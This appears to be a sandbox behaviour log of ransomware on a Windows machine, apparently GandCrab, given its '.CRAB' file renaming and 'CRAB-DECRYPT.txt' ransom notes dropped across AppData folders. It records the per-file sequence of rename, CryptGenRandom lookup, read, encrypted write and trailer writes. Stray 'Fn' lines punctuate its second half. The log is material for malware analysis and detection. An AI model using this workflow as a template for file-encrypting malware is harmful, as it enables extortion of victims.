File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, size = 1048576, size_out = 933 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, size = 944 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, size = 8 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, size = 1048576, size_out = 37703 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, size = 37712 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, size = 8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\Dictionaries\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\Dictionaries\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, size = 3278 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, size = 1048576, size_out = 83800 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, size = 83808 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, size = 8 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, size = 1048576, size_out = 40776 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, size = 40784 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, size = 8 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, size = 1048576, size_out = 86428 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, size = 86432 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, size = 8 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, size = 1048576, size_out = 35439 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, size = 35440 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, size = 8 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, size = 1048576, size_out = 86562 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, size = 86576 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, size = 8 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, size = 1048576, size_out = 83148 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, size = 83152 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, size = 8 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, size = 1048576, size_out = 58373 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, size = 58384 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, size = 1048576, size_out = 102382 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, size = 102384 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, size = 1048576, size_out = 89539 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, size = 89552 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, size = 1048576, size_out = 30268 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, size = 30272 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 1048576, size_out = 291 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 304 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 1048576, size_out = 200704 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 200704 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, size = 1048576, size_out = 64 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, size = 64 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
